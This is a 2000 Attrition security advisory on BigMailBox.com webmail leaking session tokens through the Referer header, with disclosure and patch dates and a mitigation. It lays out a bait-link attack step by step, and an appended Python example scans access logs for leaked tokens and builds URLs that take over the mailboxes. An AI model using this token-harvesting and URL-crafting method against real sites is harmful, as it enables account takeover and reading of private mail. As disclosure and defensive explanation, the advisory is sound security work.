attrition.2000-02-21.bigmailbox                     Thu Feb 10 10:57:57 CST 2000


Vendor: BigMailBox.com                              Platform: All

                   Attrition's Little Errata Report Team

                        -<)  A . L . E . R . T  (>-

     -----------------------------------------------------------------
       This advisory reports  a  recently-discovered security issue.
       It may contain a workaround or information on where to obtain
       an appropriate patch.  Advisories should be considered urgent
       as these notices are written only when the likelihood of wide
       impact is determined by the Attrition staff.  An HTML version
       of this and other advisories can be found at Attrition.Org at
       http://www.attrition.org/security/
     -----------------------------------------------------------------

  BigMailBox.com href tokens leave mailboxes open to control by a malicious site


AFFECTED SYSTEMS
---------------------------------------------------------------------------
- Users of the BigMailBox.com email
- Users of freemail systems run by BigMailBox.com


STATUS
---------------------------------------------------------------------------
BigMailBox.com was notified of the problem on Fri, 11 Feb 2000. After
additional testing and verification, staff of BigMailBox.com patched
the vulnerability on Mon, 14 Feb 2000.


BACKGROUND
---------------------------------------------------------------------------
BigMailBox.com (http://www.bigmailbox.com) offers free Web-based email
services with the site's domain name.  BigMailBox.com also offers individual
email accounts through the portal site www.gohip.com (http://www.gohip.com).
We were able to find over 100 domains using BigMailBox.com to host their
email services, including Antionline (http://www.antionline.com), Teen Zone
(http://www.teenzone.com), Anonymous.to (http://www.anonymous.to), CashPile
(http://www.cashpile.com), and TeamsterNet (http://www.teamster.net).  As
can be seen from this list, most of these are smaller portal sites using
free email for repeat traffic.


BUG REPORT
---------------------------------------------------------------------------
As we browse the web, client programs such as Netscape and Internet Explorer
forward a piece of information from one web server to the next whenever a
hyperlink is followed. This advisory calls it the HREF variable; in HTTP it
is the Referer request header. It contains the URL of the page that referred
the user to the next server. When the web visitor clicks on a hyperlink, the
HREF is sent along with the request to the next server, where it appears in
the access logs. Looking at a sample entry of an access log:

  your.machine.com - - [10/Feb/2000:22:34:30 -0700] "GET /index.html HTTP/1.0"
  200 48797 "http://remote.site.com/" "Mozilla/4.7 [en] (Win98; I)"

This shows that your.machine.com requested a web page "/index.html" on the
server, and that you found this link from a web page hosted on
remote.site.com.

BigMailBox.com uses a session token to manage access to the mail box.  This
session token tells the system that a user is logged in and accessing mail.
When the user logs out, the session token is expired, and the user must log
in again, which generates a fresh token. Without a logout, the token expires
one hour after initial login by default.

Unfortunately, this session token is part of every mailbox URL, so it is
forwarded to a third-party web site in the HREF whenever a link is followed
from an email message. With this valid session token, anyone who can read
that site's logs can access the BigMailBox.com web email account without
authenticating.

Several factors contribute to this being a serious problem.

        *  Many systems keep access logs world-readable, so that any
           system user could glean the session token from the logs.

        *  Because of the standard format of the URL required to access
           the email, it is trivial to construct a valid URL along with
           a current session token allowing a third party to view the
           mail box.

        *  BigMailBox.com's web-based mail client automatically converts
           all URLs in a message into clickable links.

        *  With the knowledge of the above, a third party can send
           the user mail with a specific URL, encouraging them to visit
           a site where the session token could be read.


THE ATTACK

1. A potential attacker sends the target a piece of e-mail with a 'bait'
   URL, in hopes of prompting them to follow the link. For example,
   sending mail to victim@antionline.org with a URL for them to visit:

     http://www.myserver.com/visit/me.html

2. BigMailBox receives the e-mail and converts the URL into a clickable
   hotlink. The victim reads the e-mail and follows the link with a
   single click.

3. www.myserver.com records the hit in its access_log, where the attacker
   is waiting. The attacker views the HREF of the entry:

     http://mail12.bigmailbox.com/users/antionlineorg/mail.cgi?act=view&PP=root/
     &fol=Inbox&mid=s00000006&mn=2&tm=2&st=A&sf=2&un=victim
     &uid=BVZkfObYaz4BZUXWkxPz2ZAvt

   Using the HREF, the attacker extracts the e-mail account name designated
   by "un=" (UserName). In the example above: victim

   Looking closely at the end of the HREF, the attacker extracts the last
   field designated by "uid=", which is the current session token. In this
   example, the session token is: BVZkfObYaz4BZUXWkxPz2ZAvt

4. Using the two fields, the attacker crafts a new URL:

     http://mail12.bigmailbox.com/users/antionlineorg/go.cgi?act=list&fol=Inbox
     &PP=root&un=victim&uid=BVZkfObYaz4BZUXWkxPz2ZAvt

   Putting this into their own browser, they can bypass the login procedure
   and access the web based e-mail account unchallenged.

From this point, the attacker has full control over the account and may
do a number of things:

        * Send mail to anyone as the legitimate user

        * Read and manipulate any mail already received
        
        * Change the default timeout from one hour to three hours

        * Modify user account information
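The log-reading and URL-crafting steps above (steps 3 and 4), together with the
Referer/HREF mechanism described in the BUG REPORT, as an added worked example.
This is not code from the original advisory and not BigMailBox.com's software.
The access_log lines are constructed for the example; the hostnames, the un=
and uid= parameters and the go.cgi?act=list URL form are taken from the
advisory's own sample URLs, and any other deployment may differ.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit, urlunsplit

# Constructed Apache "combined" format access_log lines (not real traffic).
# Line 1: a hit whose Referer is a BigMailBox.com mailbox URL carrying un= and uid=.
# Line 2: an ordinary Referer with no session data in it.
# Line 3: the URL was typed or pasted into the browser, so no Referer ("-") was sent.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Feb/2000:22:34:30 -0700] "GET /visit/me.html HTTP/1.0" 200 48797 "http://mail12.bigmailbox.com/users/antionlineorg/mail.cgi?act=view&PP=root/&fol=Inbox&mid=s00000006&mn=2&tm=2&st=A&sf=2&un=victim&uid=BVZkfObYaz4BZUXWkxPz2ZAvt" "Mozilla/4.7 [en] (Win98; I)"
198.51.100.7 - - [10/Feb/2000:22:35:02 -0700] "GET /index.html HTTP/1.0" 200 1024 "http://remote.site.com/" "Mozilla/4.7 [en] (Win98; I)"
192.0.2.9 - - [10/Feb/2000:22:36:11 -0700] "GET /visit/me.html HTTP/1.0" 200 48797 "-" "Mozilla/4.7 [en] (Win98; I)"
"""

# One "combined" log entry: host ident user [time] "request" status size "referer" "agent".
# The quoted field the advisory calls the HREF is the HTTP Referer header.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Query parameters that identify a live mailbox session in the advisory's URLs.
ACCOUNT_PARAM = "un"   # account (user) name
TOKEN_PARAM = "uid"    # session token


def parse_log_line(line):
    """Split one combined-format line into its fields; None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def extract_session(referer):
    """Return the mailbox session carried in a Referer URL, or None.

    A session is recognised when the URL's query string carries both the
    account name (un=) and the session token (uid=).  The directory part of
    the path (e.g. /users/antionlineorg/) is kept because the per-domain
    mailbox scripts live there.
    """
    if not referer or referer == "-":
        return None            # no Referer sent: typed/pasted URL or a non-web client
    parts = urlsplit(referer)
    query = parse_qs(parts.query)
    if ACCOUNT_PARAM not in query or TOKEN_PARAM not in query:
        return None
    directory = parts.path.rsplit("/", 1)[0] + "/"
    return {
        "scheme": parts.scheme,
        "host": parts.netloc,
        "directory": directory,
        "un": query[ACCOUNT_PARAM][0],
        "uid": query[TOKEN_PARAM][0],
    }


def find_leaked_sessions(log_text):
    """Scan access_log text and return every session token found in a Referer.

    A mail provider or site operator can run this over their own logs to
    check whether mailbox URLs are leaking tokens; an attacker runs the
    same scan over any log they can read.
    """
    leaked = []
    for line in log_text.splitlines():
        entry = parse_log_line(line)
        if entry is None:
            continue
        session = extract_session(entry["referer"])
        if session is not None:
            session["client"] = entry["host"]
            session["time"] = entry["time"]
            leaked.append(session)
    return leaked


def craft_hijack_url(session):
    """Rebuild the folder-listing URL from step 4 of the advisory for a leaked session.

    The go.cgi?act=list form is the one shown in the advisory; other
    deployments may use a different script name or parameters.
    """
    query = urlencode([("act", "list"), ("fol", "Inbox"), ("PP", "root"),
                       ("un", session["un"]), ("uid", session["uid"])])
    return urlunsplit((session["scheme"], session["host"],
                       session["directory"] + "go.cgi", query, ""))


if __name__ == "__main__":
    for s in find_leaked_sessions(SAMPLE_LOG):
        print(f'{s["time"]} client={s["client"]} account={s["un"]} token={s["uid"]}')
        print("  hijack URL:", craft_hijack_url(s))
```

Run stand-alone, the script reports only the first constructed line: the
second has a harmless Referer, and the third has none because the URL was
pasted rather than clicked, which is exactly why the cut-and-paste advice in
RECOMMENDED ACTIONS works. Only the hit with a token in its Referer yields a
usable mailbox URL.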



RECOMMENDED ACTIONS
---------------------------------------------------------------------------
Never click on a URL sent to you via e-mail to any BigMailBox.com email
account. Instead, cut and paste the URL into your browser to visit a site;
a URL typed or pasted into the location bar is requested without a Referer,
so the session token never leaves your mail session. The underlying problem
is that the session token travels in the URL at all: carrying it in a
cookie, which is never part of the Referer, would keep it out of other
sites' logs entirely.

Contact BigMailBox and complain about shoddy and insecure e-mail access.


RANT
---------------------------------------------------------------------------
How many times must the security community point out trivial vulnerabilities
like this? Worse, 'security'- and 'privacy'-oriented sites like AntiOnline
and Anonymous.to rely on such insecure third-party servers without testing
or auditing them to maintain a reasonable level of security.


CREDITS
---------------------------------------------------------------------------
ADVISORY: Authored by Munge and Jericho

VULNERABILITY: Found by Mcintyre


CONTACT INFORMATION
---------------------------------------------------------------------------
Questions regarding this advisory or information regarding new advisories
and potential vulnerabilities should be directed to ALERT using one of the
following methods:

E-Mail: alert@attrition.org
WWW   : http://www.attrition.org/security/attrition.html

The ALERT PGP Public Key (PGP v2.6.2, RSA) is available at:
http://www.attrition.org/security/advisory/attrition/pubkey.txt